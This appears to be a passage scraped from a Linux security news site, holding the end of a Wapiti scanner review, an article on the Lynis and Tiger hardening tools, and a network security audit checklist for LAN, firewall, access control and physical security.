exploit new found vulnerabilities and even existing ones due to poor security management, Wapiti is the perfect solution to auditing your website and webservers. The commands and arguments are fairly simple to use, it is a powerful tool, and the report provided in HTML format allows for any user to see urgent issues and their possible solutions without having to sit, search, and create a solution. It provides you with a baseline understanding of your vulnerabilities and a baseline path to a solution. Our Thoughts Web applications are the technological base of modern companies. That’s why more and more businesses and corporate institutions are looking to monitor their websites and web apps more often and wapiti is the perfect tool to do so. It is amongst many well-known web vulnerability scanners and can play an essential role in assisting daily users and System Administrators alike to deter attacks. We hope you found this article useful! Be sure to stay tuned for more tips and advice on Linux security tools. . Malicious actors will stop at nothing to breach your online platform; learn how to uncover vulnerabilities using the Arachni Tool.. Web ApplicationSecurity,Wapiti Scanner,Website Vulnerability Detection,Cyber Threat Mitigation. . Brian Gomez
Jul 04, 2022
•
102
system hardeningsecurity toolspassword managementCrucial Instruments for Safeguarding Unix-Based Systems and Platforms
System administrators are aware as how important their systems security is, not just the runtime of their servers. Intruders, spammers, DDOS attack, crackers, are all out there trying to get into people . Being able to identify tools and techniques to harden your systems is a key play on securing your systems. Moreover, choosing the right tools is a matter of experience. You should try most of them, or perhaps the ones that are popular. I chose free and open source software because, if I want to, I can check the applications source code and see for myself how did programmers wrote the software, how did they manage to keep the software easy to understand etc. Without trying to explain the networks peripherals particular importance on the security of the whole system, I will dig deep into software that check systems protocols, passwords, vulnerabilities, weaknesses, security flaws, best practices on protecting and securing your system and so on and then some important security steps any system administrator should know. I chose two popular security tools: Tiger and Lynis. Both state of the art security-auditing tools. Lynis Lynis is Unix based software and its free under the GPL and a popular security hardening solution. The advantage here is that it does not change any of your configuration files. Instead, it lists what it seas as weak or needs to change. It can scan your system in details and very extensively. Its use is straight forward, and it is OS independent, which means it will run in almost any Linux or Unix environment. You can run Lynis from USB, Cd, ext. HDD or any other media. With proper plugins, Lynis can test your databases, e-mail servers, web and what not. There are many documentations and video presentation regarding installing and configuring as well as using Lynis. I advice you to search for these and read as much as you can until you feel comfortable and start testing and using it. Latest version of Lynis as of now is 2.1.0 and can be obtained at: /downloads/lynis/ Tiger Just like Lynis, Tiger supports multiple UNIX platforms and it is free under GPL License. Besides system hardening tools, system configuration checks etc, Tiger offers host-based intrusion detection, and it is very successful at it. Its worth to note for Linux/Unix environment newcomers that, while there are lots of intrusion detection tools out there, most of them if not all are command line and offers minimal X based or GUI mode. As of now, the latest and stable version of Tiger is 3.2.3, and can be obtained at: Index of /releases/tiger/ I’ll write some Tiger scripts and their use. You are advised to check its documentation and find what interests you and what you are trying to accomplish. check_inetd – This script will check your init.d and find any misconfiguration. check_group – As its name suggests, it will check group passwords vulnerability, duplication and so on. check_accounts – This scrips will check your accounts for anything suspicious, home directories, shells, accounts with no passwords etc. check_anonftp – This checks your ftp configuration for any vulnerability. check_passwd – Checks for password configurations. Security Tips: I can’t stress enough how important it is for a Unix system to have root login disabled. This is crucial step and should be deactivated on all systems running important services, period. Besides disabling root login, it is advisable and yet very important to have X windows uninstalled. This is necessary if you’re running apache web server and you don’t need X windows. Remember, X windows are and can be vulnerable to attacks. Never use unsecured connections like telnet, ftp and so on! Use SSH, sftp instead! Set strong password policies and password expiration date, so that the user is prompted to change the password when it expires. This will ensure consistent password changes on all user accounts. I would advice to set it to three months at latest. Check file permissions periodically, this can create havocif not set properly. Close unused ports. Remove unnecessary software Check various security websites (do these daily) for security holes people and programmers found, and patch them immediately if your system is vulnerable! sysctl: an interface for changing parameters in Unix like environments. Read for sysctl and tweak the configuration the way you want it. Implement firewalls (iptables) Make daily backups! This is very important. Relocate another backup server away from the server room in case of disaster recovery etc… I could have filled this document with print screens and information on how to do all these things I explained, but I though it would be much better if you try them yourself. When you search for knowledge, I strongly believe, you will learn things much better, and sooner. You can refer to these two system hardening software and security advices, but don’t limit yourself. Try anything you can find, perhaps, look for popular software and try them on your test-machines, simulate real-life situations, configurations and so on. Remember, security measurements start with your systems version up to date! Last but not least, I would be very happy if you share some security tips with us on this post, so people can enjoy and learn more and be successful on what they do. About the Author Mr. Ibrahimi is a freelance Unix/Linux specialist and consultant with over 15+ years of experience on Open Source software. He is a regular contributor to UNIX community online as well as locally on projects involving his expertise on implementing Unix/Linux on IT infrastructures. . Being able to identify tools and techniques to harden your systems is a key play on securing your sy. system, administrators, aware, important, their, systems, security, runtime. . Dave Wreski
May 27, 2015
•
102
access controlfirewall managementsecurity guidelinesNetwork Security Audit: Key Strategies for LAN Security and Access Control
In the First part of Network Security we had a brief overview of the areas that are to be considered on accessing a network's security and also we looked into a few points in each of Management and Administration areas. . Mean while the article titled " Security Scanning is not Risk Analysis " by Laura Taylor on 14 th July 2002 is a good article and deals in depth with what an Organization's management has to know about Security. Now lets continue and look into some of the finer points in each of the other areas. i.e., LAN Security, Access control, Operations. LAN Security: Is the LAN secured from viruses? The extent of virus protection can be gauged by looking into the Anti viruses programs installed in the Network. Things like: Does the Mail gateway to the network have an online antivirus? Do the Servers in the network have an online antivirus (having antivirus only on the servers will suffice if the end user has no external net access and has no access to hardware to install new softwares like using a floppy, etc.) Is the third party media (such as Floppy/CD-ROM) access controlled (like check for viruses, etc.) Is the communication between systems controlled? Are the systems being properly isolated (Like in cases the Production systems should be separated from the development systems etc.) or are they provided with proper gateway access (setting of Firewall for control of access between intra-networks, etc.) Are software/hardware acquisitions/disposals controlled? Check whether there is an established procedure for acquiring any new software/hardware requirements (Usually its required to get proper clearance and a proper channel for acquiring any new software/hardware required). Even the disposal of the hardwares should be done with due permissions and through proper channel ( Improper disposals of Hardware like harddisks etc. can prove to be a great security risk). Check for unauthorized software/hardware installed onthe LAN. This check should be done manually on each of the systems in the network. Check for Trojans/Root kits etc. Check for the ports that are open in each of the system. Use a port scanner to detect any unwanted services running on the network. Any unwanted service/port open on the network is bound to pose a serious threat for security, usually its because it may be a backdoor/Trojan or since the administrator isn't aware of this service he may not be monitoring the secure/insecure usage of the service. This (point 4) is what is usually mistaken for a vulnerability assessment. Hope this article produce some awareness on real vulnerability assessments made by professionals and organizations give a serious thought of vulnerability assessment. Firewall and ACL Configuration Are the Firewall policies and Access Control Lists properly maintained/updated when changes are made to the network access. Usually when any changes are made to system access (in case of removal of a system from network) most of the administrators fail to cross check this change with the firewall ruleset (in case this system has access to a classified server, this ruleset still exists ) and this may be misused. Similarly the Access Control Lists should be cross-checked when any changes are made in the user/group accounts. Does the firewall contain rules to prevent denial of service attacks, rules to prevent spoofing ( eg: requests coming from outside network has IP originating from local internal LAN). These are some of the most basic rules that should be present in any firewall. Check for existence of backup firewall incase of failure of the primary one. The upload/download process should be monitored. (The user should be notified about his upload/download process and mails being monitored if it is being monitored). Does the source and destination of the data transfer authenticate each other or are the source/destination traceable (Use DHCP for LAN addressallocation usually based on Mac addresses). Check that the software license compliance exists. (i.e., make sure that the users are using legitimate software and aware of software licensing). Do checks for accounts holding privileged rights, unused accounts, is there adequate support staff for providing user support and is there any backup administrator in case of his absence. Is data being transported in encrypted mode whenever necessary. Access Control: Check that the user access is controlled appropriately. There are various guidelines to be followed when checking for user access. Each user's privileges must be defined, documented, and controlled with appropriate access controls. Look for the user name and password policy. Each user should have a unique user name. The password set for (by) the user should be of a minimum length of 6 characters, should contain a combination of alpha and numerals and one special character (such as * # % ^ & $ etc.). Users/Admins should avoid having passwords which are easily guessed like the same as username, username backwards, etc., The password should be changed regularly (a password expire period should be set). Check for guest user access rights and ex-staff accounts (should not be present). Accounts should be disabled on 4-6 unsuccessful login attempts and systems disconnected on certain time of inactivity after the connection is established to a particular system (this requires settings to be done on the servers being accessed). Dial-up access should have another level of access control apart from user id and password (like callback) The access should also be time controlled Operations: It is not necessary that there should be an operations department in each of the organizations. Some organizations suffice with only one IT department which handles all of these areas discussed. The organizations structure is not so important. But when implementing/assessing security, due care is to be taken ondescribing the duties for each of the concerned department personnel. The physical transmission media like LAN cables, Routers, Switches, etc. should be adequately protected. The LAN servers should be secured from physical access too. Unauthorized personnel shouldn't be able to get near it. Are the Systems, Peripherals, and devices being protected from fluctuations/disturbances in electric power supply. (Usually the network should contain an online UPS system to protect against electric power fluctuations and backup). The setup should also ensure non-stop working of these devices. Hence there should be a backup power supply. The data backup should be taken regularly according to a schedule (full, incremental backups) and tested for restoration and backup errors. The backup media should be physically secured. A weekly backup should be placed at a different physical location (different branch office) under safe custody in case of calamities like fire, flood, etc. The recovery process should be tested periodically. The organization should ensure an adequate staff capable of supporting the users and performing backup and recovery operations. Also ensure their availability at any time required. The user should know whom to contact on what kind of problems and how to reach them, for this the users should be briefed about their actions in such situations. Checks should be performed to adequate availability of resources (backbone, traffic on the file server and the ability of the file server to handle these loads). This check is to be performed on each of the generally accessed systems and the critical servers. The access to critical systems (not necessarily limited to this) should be restricted with proper tools like keys, badges, electronic sensors, movement sensors, biometrics identification. Are the keys to important cabinets and rooms in safe custody. The system rooms should be properly protected against fire, soexistence of Fire alarms, Fire extinguishers are all good signs of proper security. The computer systems should be periodically maintained, cleaned and a log of the same done kept for cross checks. The users/admins should be adequately trained for the duties to be performed, reporting problems. The users should be informed/warned about their intrusive activities (if any) and a procedure described for actions taken against them. Literally speaking everything listed in these parts are only guidelines to consider. An actual assessment depends on the kind of organization, their use of Information Technology, number of systems, kind of data storage, type of business the organization does. Some of these points may prove to be too much to consider in some situations (and I consider this to be too little). A security audit should take into account anything that's potential threat for disclosure of data, providing access to any unauthorized persons, improper use of resources, or the inability to handle breakdown of systems. I hope this article is of some help to someone somewhere in the globe. . Explore the critical facets of network security assessments, concentrating on local area network protection and key protocols for managing access control.. Network Security Audit, LAN Protection, Access Control Management, Firewall Configuration, Security Measures. . Anthony Pell
Mar 01, 2010
•
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Search Topics
Powered By
Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases
QUICK LINKS
subscribe to newsletters!
Like staying secure? So do we.
Sign up for updates, tips, and alerts!
Explore top 10 tips to secure your open-source projects now. Read More